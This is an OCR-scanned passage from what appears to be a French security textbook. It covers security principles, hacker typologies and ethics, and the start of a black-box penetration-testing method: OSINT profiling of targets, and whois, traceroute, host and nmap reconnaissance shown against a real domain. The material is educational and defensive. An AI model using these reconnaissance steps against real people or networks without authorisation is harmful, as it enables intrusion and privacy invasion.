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Chapitre 1 
Introduction et définition 


1. Présentation 


1.1 L'information est partout 


À l'heure du "tout disponible partout tout de suite", le transport des don- 
nées en dehors du domicile d'un particulier ou d'une entreprise est une réa- 
lité qui mérite que l'on s'interroge sur la sécurité des transmissions pour ne 
pas compromettre un système d'information. 


Que ce soit à l'échelle d'une entreprise, d'une multinationale ou à plus 
J 

petite échelle, la sécurité d'un système d'information prend plus ou moins 

d'importance selon la valeur que l'on confère à ces données. 


Avec le développement d'Internet, chacun a accès au réseau où de plus en 
plus d'informations circulent. De plus en plus, les entreprises communi- 
quent et diffusent via ce media, que ce soit dans leurs liens avec leurs four- 
nisseurs ou leurs partenaires ou en interne, dans les relations entre les 
employés eux-mêmes. 


Nous sommes face non seulement à une augmentation de la quantité, mais 
aussi et surtout de l'importance des données. 
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L'ensemble formé par tout le réseau d'utilisateurs de ce système d'informa- 
tion se doit d'être connu pour être sûr. Les ressources qui y circulent doi- 
vent absolument être protégées et pour cela, la maîtrise du système d'infor- 
mation est indispensable. Chaque acteur du système a un rôle à respecter, 
qui doit être défini scrupuleusement. 


Connaître le système d'information pour le protéger 


Le système d'information définit l'ensemble des données et des ressources 
matérielles et logicielles de l'entreprise. Ce système permet de stocker et de 
faire circuler les ressources qu'il contient. Il représente également le réseau 
d'acteurs qui interviennent dans celui-ci, qui échangent les données, y 
accèdent et les utilisent. 


Ce système représente la valeur de l'entreprise, il est essentiel de le proté- 
ger. Le compromettre revient à compromettre l'entreprise. 


Il convient donc d'assurer sa sécurité en permanence, et surtout dans des 
conditions d'attaque, d'espionnage ou de défaillance. Il faut s'assurer que les 
ressources servent uniquement dans le cadre prévu, par les personnes accré- 
ditées et surtout pas dans un autre but. 


Le risque encouru par un système est lié de manière étroite à la menace et 
à la vulnérabilité qui le touchent, mais également aux contre-mesures mises 
en œuvre. 


La menace qui plane sur un système englobe les types d'actions menées 


dans le but de nuire à ce système (attaque, espionnage, vol d'informa- 
tions...). 


La vulnérabilité représente les failles, les brèches dans le système, tout ce 
qui expose le système à la menace : manque de sauvegardes, de robustesse, 
une architecture défaillante... 


Enfin les contre-mesures sont les actions mises en œuvre pour prévenir la 
menace, une fois qu'elle est mesurée, ce qui passe d'abord par une prise de 
conscience. 
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La menace qui plane sur un système est un fait : plus l'entreprise possède 
des informations importantes, plus elle y sera soumise. Cependant, elle 
peut directement impacter le niveau de sécurité de son système en s'effor- 
çant de mettre en place des contre-mesures, c'est-à-dire en s'attachant à la 
protection de son système, qui ne doit jamais être négligée. Ce sont en 
effet, ces contre-mesures qui vont diviser le risque d'attaque et la compro- 
mission des données. 


La sécurité engendre généralement le déploiement de moyens techniques, 
mais également et surtout, de solutions de prévention, qui doivent absolu- 
ment prendre en compte la formation et la sensibilisation de tous les 
acteurs du système. Des règles et des bonnes pratiques doivent être mises 
en place pour ne pas créer de brèche humaine. Ce sont les actifs d'une en- 
treprise qui possèdent son capital intellectuel. Ce capital, forgé par son 
organisation, son économie ou encore sa valeur, représente un patrimoine 
d'informations à protéger. 


Identifier la menace 


Pour mettre en place une politique de sécurité, il faut d'abord commencer 
par identifier la menace, le risque potentiel. Il faut connaître son ennemi, 
ses motivations et prévoir la façon dont il procède pour s'en protéger et 
limiter les risques d'intrusion. 


La sécurité d'un système repose sur cinq grands principes : 

- L'intégrité des données : il faut garantir à chaque instant que les données 
qui circulent sont bien celles que l'on croit, qu'il n'y a pas eu d'altération 
(volontaire ou non) au cours de la communication. L'intégrité des don- 
nées doit valider l'intégralité des données, leur précision, l'authenticité et 
la validité. 

- La confidentialité : seules les personnes habilitées doivent avoir accès aux 
données. Toute interception ne doit pas être en mesure d'aboutir, les 
données doivent être cryptées, seuls les acteurs de la transaction possé- 
dant la clé de compréhension. 


Il 
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- La disponibilité : il faut s'assurer du bon fonctionnement du système, de 


l'accès à un service et aux ressources à n'importe quel moment. La dispo- 
nibilité d'un équipement se mesure en divisant la durée durant laquelle 
cet équipement est opérationnel par la durée durant laquelle il aurait dû 


être opérationnel. 


- La non-répudiation des données : une transaction ne peut être niée par 


aucun des correspondants. La non-répudiation de l'origine et de la récep- 
tion des données prouve que les données ont bien été reçues. Cela se fait 
par le biais de certificats numériques grâce à une clé privée. 

- L'authentification : elle limite l'accès aux personnes autorisées. Il faut 
s'assurer de l'identité d'un utilisateur avant l'échange de données. 


On mesure la sécurité d'un système entier à la sécurité du maillon le plus 
faible. Ainsi, si tout un système est sécurisé techniquement mais que le 
facteur humain, souvent mis en cause, est défaillant, c'est toute la sécurité 


du système qui est remise en cause. 


Dans un contexte global, la sécurité doit être assurée : 

- au niveau utilisateur, les acteurs doivent comprendre l'importance de leur 
position. 

- au niveau des technologies utilisées, elles doivent être sûres et ne pas pré- 
senter de failles. 

- au niveau des données en elles-mêmes, avec une bonne gestion des droits 
d'accès (authentification et contrôle, l'utilisateur doit posséder unique- 
ment les droits qui lui sont nécessaires). 

- au niveau physique (accès à l'infrastructure, au matériel...), rien ne sert 
de sécuriser un système logiquement si matériellement l'accès à la salle 
des machines n'est pas sécurisé. 


instaurer de bonnes pratiques de sécurité 


Cependant, la sécurité ne doit pas être une gêne au quotidien, elle ne doit 
pas perturber l'utilisateur et doit permettre à quiconque d'utiliser le sys- 
tème en toute confiance. Il faut donc établir une politique de sécurité, et 
pour cela il faut commencer par identifier les besoins en terme de sécurité, 
réfléchir et définir les risques ainsi que les conséquences. 
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Un particulier n'aura pas les mêmes attentes qu'une entreprise, il faut donc 
évaluer l'importance des données. 


Des règles et des procédures doivent ensuite être mises en place pour les 
différents services. 


Un administrateur se doit de faire de la surveillance passive et active. Il 
doit connaître les vulnérabilités matérielles ou logicielles qui pourraient 
toucher le système qu'il gère, se tenir informé des failles décelées. 


Enfin, puisqu'aucun système n'est infaillible, il ne faut pas oublier de défi- 
nir la politique à appliquer en cas de menace, de détection de vulnérabilité : 
que faire, qui contacter ? 


Auditer son système 


Enfin, il est bon d'auditer un système pour connaître son niveau de sécurité 
réel. 


Pour cela, on réalise un test d'intrusion, mené soit par le responsable de la 
sécurité informatique du réseau, soit par un professionnel de la sécurité 
informatique, un hacker professionnel. Cela se fait bien sûr en accord avec 
l'entreprise. 


Il s'agit donc de tenter une intrusion du système, on dit qu'il s'agit d'un au- 
dit de vulnérabilité. Dans ce cas, la personne réalisant le test doit expliciter 
les actions à mener et obtenir une autorisation signée. Cette autorisation 
doit bien sûr être donnée par une personne qui y est habilitée, un Respon- 


sable de la Sécurité des Systèmes d'Information (RSSI). 


En interne, seul le RSSI ou le responsable de la sécurité de l'entreprise peut 
faire ce test. 


De plus, il est conseillé de prévenir le moins de monde possible dans l'en- 
treprise lors d'audits de sécurité afin de ne pas fausser le contexte. Rappe- 
lons que dans la réalité, la majorité des intrusions système se font le 
week-end. 
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2. Une nouvelle éthique de travail 


2.1 La connaissance avant toute chose 


Quand on parle de sécurité informatique, on ne peut ignorer le monde 
underground, celui des hackers et autres pirates du Web. 


Ils sont fortement médiatisés, généralement à tort et l'objet de nombreuses 
confusions. Nous allons donc d'abord définir brièvement les différents pro- 
fils que l'on retrouve sous ce terme mal employé de "pirate". 


Tout d'abord, la définition du terme hacker, qui est assez large. À l'origine, 
"hacker" est un mot anglais qui veut dire "bricoleur" ou encore "bidouilleur". 
En informatique, ce terme est utilisé pour définir les programmeurs 
débrouillards, avec des connaissances techniques élevées. Ces program- 
meurs sont avant tout passionnés par ce qu'ils font, ils ne se posent pas de 
limites pour la connaissance ou pour assouvir leur curiosité. 


Les hackers sont également capables de détourner un objet ou un logiciel 
de son fonctionnement originel. 


Ils utilisent leur savoir pour découvrir les choses auxquelles ils ne sont pas 
censés avoir accès. 


Mais la communauté des hackers va également au-delà de la connaissance 


technique. Être un hacker correspond davantage à un état d'esprit plus 
qu'au fait de programmer. 


Ainsi, les hackers sont généralement des personnes cultivées qui connais- 
sent à la fois l'historique de leur statut, les grands acteurs du mouvement, 
qui se tiennent informés de tout ce qui s'apparente à leur domaine et qui 
ont soif de connaissance. 


Il convient cependant de remettre à plat les définitions habituelles que l'on 
donne des hackers pour corriger quelques travers portés par les médias de 
masse, et de distinguer les différents types de cette grande famille... 
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Les hackers « black hats », les chapeaux noirs 


Généralement, ces hackers ne respectent pas la loi, ils pénètrent par effrac- 
tion dans les systèmes dans un intérêt qui n'est pas celui des propriétaires 
du réseau. L'intérêt y est personnel, généralement financier, en tout cas le 
but est nuisible à la personne (physique ou morale) visée. 


Ces hackers sont d'ailleurs plus généralement appelés des crackers. 


Les crackers ayant une nette attirance pour ce côté obscur sont par 
exemple les créateurs de virus, de chevaux de Troie ou de logiciels espions. 


Lorsque cela est fait dans le but de nuire à une organisation ou à des indivi- 
dus, on parle aussi de terrorisme ou de cyber-terrorisme. 


Il n'est pas rare que les black hats changent de bord et se fassent embau- 
cher par de grandes sociétés. En effet, la connaissance de ces passionnés est 
telle qu'elle peut aider une entreprise dont les données sont sensibles à 
mettre en place la sécurité. 


Cependant la communauté des black hats est assez large et possède des 
convictions, des opinions et des connaissances bien différentes, qui en sépa- 
rent les différents acteurs. 


Les hackers « white hats », les chapeaux blancs 


Techniquement, l'action menée par les white hats est très proche de celle 
des black hats. Cependant, elle se différencie par le but ou la finalité. 


En effet, les « white hackers » ont plutôt comme ambition d'aider à la sécu- 
risation du système, sans en tirer profit de manière illicite. 


Les white hats bricolent et testent les systèmes d'information pour décou- 
vrir les vulnérabilités pas encore connues ou non publiques, les « 0 day » 
(zéro day, zéro jour). La technique employée est la même que pour un 
hacker au chapeau noir. 
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Leur atttitude est par contre différente lors de la découverte de cette vulné- 
rabilité. La question qui se pose alors est de savoir s'il faut rendre une vul- 
nérabilité publique ou non. Les hackers au chapeau blanc prônent la divul- 
gation totale de la découverte, ce que l'on appelle en anglais la full 
disclosure, là où les hackers au chapeau noir préfèrent restreindre l'accès à 
cette information et ne pas la divulguer. 


Les white hats rendent alors publiques les vulnérabilités, et parfois même 
les exploits, qui sont les bouts de code permettant de tester la vulnérabilité 
d'un système à cette faille. Cela se fait sur des outils en ligne spécialisés 
comme des listes de diffusion ou des outils de gestion de bug (bugtracking). 


Le problème qui en résulte est que ces codes sont également rendus dispo- 
nibles pour quiconque, dont les script-kiddies, que nous verrons ensuite. 


Cependant, un white hat met également au courant les auteurs des vulné- 
rabilités qui les touchent (lorsqu'ils n'agissent pas dans le cadre d'une mis- 
sion d'audit qui explique leurs actions), contrairement aux black hats. 


Même si les white hats disent agir dans la légalité et pour la bonne cause, 
en réalité depuis que la loi sur l'économie numérique, la LCEN (Loi pour la 
Confiance dans l'Economie Numérique), a été votée en France, seule l'in- 
tention reste réellement bonne. Ces hackers sont considérés également hors 
la loi puisque le fait de divulguer des vulnérabilités et des exploits sur 
Internet est dès lors devenu répréhensible. Cette loi contredit ainsi de plein 
fouet l'éthique hacker et également le principe du logiciel libre. 


Les hackers « grey hats », les chapeaux gris 


Le hacker au chapeau gris est un peu un hybride du chapeau blanc et du 
chapeau noir. 


Il s'agit d'un hacker compétent, qui agit parfois avec l'esprit d'un white hat, 
parfois avec celui d'un black hat. 


Son intention n'est pas forcément mauvaise mais il commet cependant 
occasionnellement un délit. 
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Beaucoup de hackers qui se disent white hats s'apparentent en réalité plus 
à des grey hats, dans le sens où ils ne révèlent pas toujours leurs découver- 
tes et en profitent à des fins personnelles. 


Les « script kiddies » 


Dans le problème lié à la publication sur Internet des vulnérabilités décou- 
vertes, on trouve l'un des éléments clés de la discorde, les script kiddies, au- 
trement dit des jeunes pirates néophytes. 


Ces individus récupèrent les exploits laissés par les white hats sur les outils 
publics et les exécutent sur des machines, sans aucune connaissance, dans 
le but de provoquer des pannes volontaires, des #ass-root. 


Généralement un script kiddie est un jeune adolescent, pénétrant par 
effraction dans un système, après avoir étudié/lu dans des livres ou sur 
Internet quelques documentations de base sur le sujet de la sécurité infor- 
matique. Le script kiddie n'a aucune notion de l'éthique d'un hacker, il agit 
par vantardise auprès de ses copains, il n'est pas rare par exemple qu'il 
demande à "pirater un compte de messagerie instantanée". 


Le script kiddie n'a pas de réelles connaissances, il ne fait que réutiliser des 
codes ou des programmes prêts à l'emploi, il réutilise sans comprendre les 
enjeux. 


Mais les script kiddies sont craints, puisque malgré leur faible niveau, le 
fait qu'ils utilisent le code des autres représente parfois une menace réelle 
pour un système, surtout qu'ils sont nombreux et peu soucieux des dégâts 
qu'ils occasionnent. Cependant ils sont trop souvent confondus avec les 
réels hackers. 


Ils sont également rejetés complètement des communautés underground, 
où ils sont considérés comme des lamers, c'est-à-dire des personnes dénuées 
de compétences. 
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Les hackers universitaires 


Ce sont des hackers libres, que l'on associe au mouvement Open Source du 
logiciel libre, comme Richard Matthew Stallman, le fondateur du projet 
GNU. Cette définition du hacker libre est apparue au MIT, le Massachu- 
setts Institute of Technology. 


Le hacker est alors défini comme quelqu'un qui partage sa connaissance 
avec autrui, sur le fonctionnement d'un système, des ordinateurs et des 
réseaux. Ces hackers prônent la pensée selon laquelle l'information est libre 
et n'appartient à personne. Ainsi, toute nouvelle connaissance se veut 
d'être partagée avec tout le monde. 


Ces hackers forment une grande communauté qui partage la même culture 
et qui compte des programmeurs aux compétences aiguisées, des spécialis- 
tes des réseaux et des technologies. Les hackers travaillent ensemble et ain- 
si sont à l'origine de grandes œuvres, comme Internet ou encore Usenet, ou 
le système d'exploitation Unix. 


En 1984, Steven Levy a défini "l'éthique hacker" selon les principes sui- 

vants : 

- Toute information est par nature libre et gratuite. 

- L'accès aux ordinateurs devrait être total, illimité, possible pour tout le 
monde. 

- La décentralisation des données doit être encouragée. 

- Les hackers devraient être jugés sur le hacking, non pas sur des hiérar- 
chies sociales telles que le diplôme, l'âge ou le grade. 

- On peut créer de l'art et de la beauté avec un ordinateur. 

- Les ordinateurs peuvent améliorer la vie. 


Un rapport différent au travail 


Bien sûr, cette définition des hackers est un peu facile et constamment 
sujette à des discordances. Il s'agit d'une classification trop manichéenne : 
d'un côté les gentils, d'un autre les méchants. 
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Mais cela permet de contrecarrer les idées reçues que l'on a sur ce monde, 
et particulièrement celles des médias de masse qui confondent trop souvent 
hacker et cracker. 


Mais ce qui différencie également les hackers, c'est ce rapport alternatif au 
travail, à l'argent et au temps, qui se réfère à une éthique complètement 
différente du rapport capitaliste habituel que l'on retrouve en société. 


Ils n'hésitent pas non plus à travailler en coopération pour la production. 


La relation au travail est passionnée, elle mêle la passion, le plaisir d'aller 
plus loin, la découverte, la curiosité, le jeu... ; ainsi absorbés par leur travail, 
les hackers multiplient sans cesse leurs connaissances. 


Le hacker connaît aussi une certaine indépendance salariale, comme s'il fai- 
sait partie d'un communisme basé sur la science. 


Dans ce sens, nous pouvons faire référence à de nombreux exemples pour 
montrer l'efficacité des hackers en coopération. 


Par exemple, Linux pour ne citer que lui, est un emblème de la production 
des hackers du libre. Linux a été développé de manière indépendante, 
volontaire, dans un contexte en marge du système capitaliste, et possède 
aujourd'hui une bonne part de marché en utilisation serveur ainsi qu'une 
croissance importante en terme d'ordinateurs personnels. 


Nous sommes face à une remise en cause du schéma de l'économie capita- 
liste. Le hacker produit de façon libre, selon un modèle ouvert, pour la 
communauté. Il partage ses connaissances, construit avec les autres. 


Cette originalité dans leur éthique de travail était jusqu'alors fortement 
controversée, par rapport aux tenants de l'approche standard économique. 
Cependant, force est de constater que cette auto-organisation dont la 


structure s'apparente pleinement à un réseau fortement horizontal, est 
source de réussite. 


Le travail des hackers se fait de manière directement coopérative et volon- 
taire, en différents petits groupes fortement autonomes. 
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2.3 La coopération comme clé de réussite 


La sécurité, nous l'avons vu, touche tous les utilisateurs du système. Cela 
implique donc une bonne connaissance des règles par les utilisateurs, au 
travers de formations, sensibilisations, de manière régulière. 


Cela s'ajoute à la sécurité des dispositifs matériels et logiciels : sauvegardes, 
mises à jour, plan de reprise en cas d'incident, etc. 


L'insécurité provient généralement de la non-connaissance des fonctionnali- 
tés du système. Par exemple, le fait de laisser un service actif parce que l'on 
ne sait pas s'il est utile, représente un risque potentiel. Tout d'abord, il 
s'agit d'une porte supplémentaire sur le système, donc d'un accès à surveil- 
ler. Mais le fait de ne pas connaître un service exécuté sur un système ou 
de ne pas savoir s'il est utile constitue un réel risque. On ne se renseigne 
alors pas sur les vulnérabilités connues qui le touchent, on ne le configure 
peut-être pas comme il le faudrait... Cela peut vite devenir un facteur 
d'intrusion. 


Il arrive également qu'un acteur du système ne connaisse tout simplement 
pas les moyens de sécurité mis en place. 


Quoi qu'il en soit, pour assurer l'état de sécurité d'un système, il convient 
d'analyser le système pour en connaître les forces et les faiblesses, qu'il fau- 
dra bien sûr corriger. 


Pour cela, nous l'avons vu, on réalise ce qu'on appelle un audit de sécurité. 


Il peut être réalisé par le responsable sécurité du système, s'il possède les 
connaissances suffisantes, mais il est préférable de faire appel à un tiers de 
confiance, spécialisé dans la sécurité informatique, pour valider les moyens 
mis en place pour assurer la protection, au regard de la politique de 
sécurité. 

En effet, une personne extérieure aura une vision beaucoup plus neutre, 
globale et proche de la réalité. Elle sera également en mesure de conseiller 
en cas de défaillance, et de mettre en place une politique de sécurité plus 
saine grâce à des formations par exemple. 
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Ces spécialistes sont des hackers professionnels, qui sont accrédités pour 
réaliser des tests d'intrusion, et qui prennent donc connaissance de l'état 
d'une architecture à un instant t. 


Les données étant de plus en plus étendues, accessibles à plus de monde, de 
manière plus complexe, la tendance qui se dessine dans les entreprises est 
clairement de faire appel à des spécialistes, et non plus à l'administrateur 
du système. Il s'agit d'une prise de conscience face à l'importance des don- 
nées que possède une structure professionnelle. 


En tant que spécialiste de la sécurité informatique, un hacker connaît en 
effet les moyens de déjouer cette sécurité. Ce professionnel de confiance va 
pouvoir se mettre dans la peau d'un utilisateur mal intentionné (aux 
connaissances étendues), en testant le système dans des conditions de mal- 
veillance, pour s'assurer que les données sont en sécurité, et le cas échéant, 
comprendre pourquoi et corriger le problème. 


Derrière ces spécialistes se cachent en réalité des hackers « white hats ». 
Ces hackers possèdent un sens de l'éthique et de la déontologie, contraire- 
ment aux crackers. Les tests d'intrusion se font en accord avec les clients et 
la législation. 


Il y a donc également eu une prise de conscience envers ces hackers, que 
l'on a appris à différencier des terroristes, des espions ou des créateurs de 
virus. 


Il est devenu évident que face à des personnes mal intentionnées avec de 
tels moyens et connaissances, il fallait un niveau de connaissance et de pro- 
tection au moins équivalent pour protéger un système. 


Aujourd'hui, les entreprises sont prêtes à faire cette démarche, et n'hésitent 
plus à embaucher les meilleurs crakers, ayant même fait de la prison ou 
commis de graves délits, pour s'assurer de la sécurité de leur système. 
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Les tests d'intrusion peuvent être conduits de différentes manières, la prin- 
cipale différence est la connaissance du système. En effet, les tests peuvent 
être faits en conditions réelles, sans aucune connaissance du système, c'est 
un test en boîte noire. Dans ce cas, le hacker testant le système devra 
découvrir l'infrastructure et le système au fur et à mesure de ses tests avant 
de pouvoir en tester les vulnérabilités. C'est de ce principe que nous 
partirons dans le prochain chapitre. 


Il existe également des tests en boîte blanche, où le hacker connaît entière- 
ment le système qu'il va tester, que ce soit au niveau de l'infrastructure, du 
réseau, des services et du code source. Dans ce contexte, le test simule 
davantage la perte d'informations sensibles. Le test pourra se faire en pro- 
fondeur pour tester au maximum la sécurité. 


Tous des hackers ! 


Si on raisonne de manière un peu plus neutre, on peut dire que l'éthique 
hacker présente de nombreuses analogies avec celle de personnages ayant 
un rôle déterminant dans l'économie, à savoir les scientifiques et les 


chercheurs. 


En effet, ils partagent une éthique assez proche de celle des hackers, une 
éthique qui est fondée sur le partage, la passion et l'absence de propriété 
vis-à-vis de la connaissance créée. 


Et à l'heure actuelle, l'activité scientifique et la recherche fondent une 
pierre angulaire de la dynamique capitaliste, il y a de moins en moins de 
frontières ou de cloisonnement entre le scientifique et l'économique. 
Quand un nouvel algorithme de cryptage est créé, il faut peu de temps aux 
créateurs de logiciels pour vendre un logiciel permettant de réaliser ce cryp- 
tage. Nous sommes donc face à une nouvelle confrontation de la connais- 
sance "libre" et ouverte, et de la propriété économique. 


Quoi qu'il en soit, la culture hacker underground est forte. 


Le 8 janvier 1986, le hacker Loyd Blankenship publie un article dans le 
magazine électronique Phrack, appelé Le Manifeste du Hacker. 
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Ce Manifeste est considéré comme crucial dans la contre-culture, expli- 
quant ainsi l'éthique des premiers hackers. Dans ce texte, il annonce ainsi 
(texte traduit parNeurAlien, pour No way) : 


Oui, je suis un criminel. Mon crime est celui de la curiosité. Mon crime est celui de 
J 
juger les gens par ce qu'ils pensent et disent, pas selon leur apparence. 


Mon crime est de vous surpasser, quelque chose que vous ne me pardonnerez ja- 
mais. 


Je suis un hacker, et ceci est mon manifeste. Vous pouvez arrêter cet individu, mais 
vous ne pouvez pas tous nous arrêter. après tout, nous sommes tous les mêmes. 


Lien vers l'article original : 
http://www.phrack.org/issues.html?issue=/&id=3#article 
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1. Préambule 


Nous allons nous placer dans la situation d'un test d'intrusion en condition 
réelle, c'est-à-dire en boîte noire. Nous ne connaissons rien sur le système 
cible, ni l'architecture, ni les services, ni l'organisme réellement. 


Dans cette partie, nous allons donc passer en revue la méthodologie 
retenue généralement par les attaquants pour s'introduire illégalement dans 
un système d'information, quelle qu'en soit la finalité. 


Cette partie ne vise pas à expliquer comment compromettre un système 
mais une fois de plus, à comprendre la façon dont il peut être compromis, 
afin de mieux pouvoir s'en prémunir. 


La meilleure façon de se protéger étant de procéder de la même manière 
que l'ennemi pour connaître ses vulnérabilités et les corriger, nous allons 
nous placer dans la peau de l'attaquant. 


BRemarque 
Dans notre cas, notre système d'exploitation sera Linux, majoritairement utilisé 
sur les serveurs sensibles ainsi que chez les attaquants. ll va de soi que le prin- 
cipe est globalement le même sur tout type de système, seuls les outils 
changent. 
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Collecte des informations 


Connaître sa cible 


Toute attaque nécessite une phase de préparation correspondant à la col- 
lecte des informations. Cette phase, aussi appelée prise d'empreinte (finger- 
printing en anglais), rassemble l'ensemble des techniques permettant à l'at- 
taquant de prendre le maximum d'informations sur sa cible, de la 
connaître, afin de mener l'attaque de façon efficace, et d'attaquer les points 
sensibles. 


Pour cela, certaines sources d'informations sont très faciles d'accès, et cela 
pour tout un chacun. D'autres le sont moins, mais d'une manière générale 
beaucoup plus d'informations que ce que l'on pense et qui nous concernent 
sont disponibles de manière publique, ou presque publique. 


Certaines informations sont obligatoirement accessibles pour le respect des 
législations ou des besoins administratifs, ou encore pour une nécessité 
technique. 


Google est notre ami 


Le premier outil indispensable à toute collecte d'informations, est bien sûr 
le moteur de recherche Google. Google est en possession d'une base de don- 
nées immense contenant des informations sur tous les sujets, pratiquement 
toutes les personnes. Une simple recherche peut mener très loin. 


Avec le succès des réseaux sociaux sur Internet, nous ne comptons plus les 
1 
profils mal protégés qui s'exposent dangereusement aux yeux de tous. 


En effet à l'heure actuelle avec la circulation des données en accès libre, il 
n'est vraiment plus nécessaire d'enfreindre la loi pour obtenir des informa- 
tions que l'on peut avoir en toute légalité sans grande recherche. Sur Inter- 
net, nous avons accès aux informations personnelles des employés d'une 
entreprise aussi bien qu'aux informations administratives. Rien de plus 
simple que de connaître le gérant d'une société, grâce à Infogreffe.fr ou 
Societe.com | 
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Avec Facebook ou encore Copains d'avant, il est facile d'obtenir des infor- 
mations personnelles. La grande tendance actuelle étant d'exposer sa vie au 
grand jour sur Internet et de créer des liens entre tous les réseaux en ligne, 
en quelques clics, on peut tracer un profil précis de sa cible. Même s'il est 
essentiel de vérifier les informations trouvées sur la toile de cette manière, 
il s'avère que la plupart sont exactes. Même les détectives privés et les 
agents secrets s'en servent | 


Mais même sans ces réseaux, Internet est riche en informations concernant 
une personne ou une entreprise, à travers les sites web, les forums, les 
archives de listes de diffusion... Et bien sûr, les moteurs de recherche sont 
une bonne façon d'accéder à ces informations. 


Des sites web se sont même spécialisés dans la recherche d'informations 
concernant une personne, comme 123people, et même si leur principe est 
assez controversé, et s'ils ne sont pas toujours vraiment aussi efficaces 
qu'une recherche manuelle, le fait est qu'ils nous exposent la réalité en face 
: un simple nom et des milliers d'informations peuvent être remontées, que 
ce soit des informations textuelles ou imagées. 


Dernièrement, le magazine Le Tigre a voulu démontrer les dangers des 
informations trop facilement accessibles par tous en réalisant et publiant le 
portrait d'une cible inconnue grâce aux informations qu'elle avait laissées 
sur Internet. Cela a fait réagir beaucoup d'internautes et a permis d'aug- 
menter les mesures de confidentialité sur les différents réseaux. Cependant, 
force est de constater qu'Internet reste trop bavard. 


Article sur le Tigre : http//www.le-tigre.net/Marc-L.html 


L'attaquant peut ainsi apprendre beaucoup sur sa cible, de manière directe 
(nom, adresse, localité...), mais aussi de manière indirecte, sur les forums 
ou sur les sites communautaires. Il peut ainsi cerner les centres d'intérêt, 
l'état d'esprit, ou connaître son entourage, les archives de listes de diffusion 
des discussions laissées par les équipes techniques d'une entreprise consti- 
tuent également des traces intéressantes. Il est bon de savoir qu'une infor- 
mation seule rendue publique n'est peut-être pas exploitable, mais recoupée 
avec d'autres informations de ce type, elle peut former une source 
d'informations importante. 
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Pour contrer cette fuite d'informations, il existe des parades bien évidem- 
ment, mais surtout des attitudes à adopter et à faire adopter par toute l'en- 
treprise. 


Dans une entreprise, il faut limiter les messages publics d'informations sen- 
sibles sur les listes de diffusion ou les forums, ou en tout cas les cacher au 
maximum (le nom, l'adresse e-mail, l'adresse IP...). 


Il faut également éviter de diffuser les informations sur les services utilisés 
et/ou sur leurs versions, afin d'éviter la fuite d'informations en cas de failles 
sur l'une des versions utilisées. 


D'une manière générale, toute information susceptible d'aider un attaquant 
à un moment ou à un autre doit être absolument cachée du public. Si cela 
paraît évident pour un mot de passe, cela peut s'appliquer à des informa- 
tions qui ne semblent pas forcément sensibles au sein d'une discussion 
technique mais qui peuvent nettement faciliter la vie d'un attaquant à un 
moment donné, comme par exemple un identifiant utilisateur, un chemin 
quelconque (attention aux publications de journaux système ou de messa- 
ges d'erreur), un nom de machine, une adresse IP... Ces informations en 
elles-mêmes sont assez inutiles mais là encore, recoupées avec d'autres 
informations, elles peuvent être l'élément manquant à l'attaquant à un mo- 
ment donné, les lui donner ne fera qu'accélérer son intrusion et/ou la 
rendre plus efficace. 


Enfin, il est essentiel de ne pas laisser d'accès aux rapports d'analyse : rap- 
ports de supervision, graphes de statistiques, etc. 


Ces informations en elles-même peuvent paraître anodines une fois de plus, 
mais elles fournissent des informations essentielles, concernant la nature 
du système d'exploitation, les adresses IP (même si elles sont locales), les 
services utilisés et leurs versions. Et une fois de plus, ces informations ne 
concernent pas les membres externes aux équipes systèmes. 
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Les humains sont bavards 


De même, il est bon d'interdire aux employés d'une société d'utiliser leur 
adresse e-mail professionnelle en dehors des communications professionnel- 
les, en particulier sur les forums de discussion, afin d'éviter les risques d'in- 
génierie sociale. 


Le personnel technique ou non doit absolument être sensibilisé à la notion 
d'espionnage économique et à la criminalité informatique, de façon perma- 
nente grâce à des formations. Il est également indispensable de savoir repé- 
rer une tentative d'ingénierie sociale, et surtout, de savoir s'en prémunir. 


En effet, la manipulation des êtres humains qui possèdent les informations, 
en profitant de leur naïveté, de leur gentillesse, ou de la confiance que l'on 
accorde naturellement un peu facilement à n'importe qui, sans vérifier son 
identité réelle, permet d'entrer en contact facilement avec un acteur du 
réseau, en prenant une fausse identité. 


Il est ainsi très facile à l'attaquant d'insérer un cheval de Troie dans le 
réseau via cette cible intermédiaire, ou d'obtenir des informations très 
importantes. 


Quelques commandes utiles 


Côté technique, de nombreux outils peuvent nous renseigner sur l'architec- 
ture d'un réseau cible. 


Par exemple, la commande whois, disponible sur les plates-formes Linux 
(dans le Gestionnaire de paquets) ou sur le site www.whois.net, est déjà 
un bon outil de base. Elle cherche dans une base de données mondiale des 
noms de domaines, les informations publiques liées au nom de domaine 
demandé. Certaines informations peuvent être cachées par le propriétaire, 
s'il le souhaite, mais néanmoins, elles sont assez rarement cachées et il est 
possible d'accéder à des informations qui peuvent nous donner une 
première idée de la cible. 


f $ whois editions-eni.fr 
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Ainsi, avec whois, on peut généralement se renseigner sur le propriétaire du 
nom de domaine, de l'organisme propriétaire du nom de domaine. Parfois, 
on a même accès à l'adresse postale du propriétaire, le contact mail du res- 
ponsable, le numéro de téléphone... Bref, des informations qui nous 
aiguillent sur la cible. 


La commande traceroute, disponible dans le Gestionnaire de paquets des 
systèmes Linux ou tracert sous Windows, peut également s'avérer utile, en 
listant les nœuds intermédiaires entre un point de départ et un point 
d'arrivée, elle nous informe sur le routage des paquets, et donc nous aide à 
situer le routeur dans le réseau. 


|| $ traceroute editions-eni.fr 


La commande host quant à elle, liste les machines enregistrées dans les 


DNS de la cible. 


$ host editions-eni.fr 

editions-eni.fr has address 81.80.245.20 

editions-eni.fr mail is handled by 20 smtp.eni-ecole.fr. 
editions-eni.fr mail is handled by 10 mailhost-ma.eni.fr. 


La prise d'empreinte par pile TCP/IP 


Nmap permet quant à lui de faire le scan des machines d'un sous-réseau, 
d'en connaître les ports ouverts, et donc probablement de connaître les ser- 
vices lancés sur chaque machine, de connaître leurs versions et potentielle- 
ment les vulnérabilités. 


En interrogeant la pile TCP/IP (Transmission Control Protocol/Internet Protocol) 
d'un serveur, on peut en effet apprendre de nombreuses informations utiles 
lors d'une attaque. 


Tout d'abord, la connaissance du système d'exploitation d'un serveur est 
évidemment cruciale pour un attaquant. Beaucoup de failles sont spécifi- 
ques aux systèmes d'exploitation, et les façons d'y pénétrer sont également 
différentes. 
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Si un exploit existe concernant un service de Solaris par exemple, une prise 
d'empreinte peut nous indiquer quelles sont les machines utilisant Solaris, 
et si le service concerné est lancé, l'attaque est imminente. 


Le fait de balayer un réseau, de le scanner, permet de connaître sa topo- 
logie. Le scanneur de ports va détecter les IP actives sur le réseau, détecter 
les ports ouverts et les services potentiels qui tournent derrière chaque port 
ouvert. 


En cela, nmap est un outil pratique et indispensable pour tout administra- 
teur, dans le sens où il est capable de retirer beaucoup d'informations par 
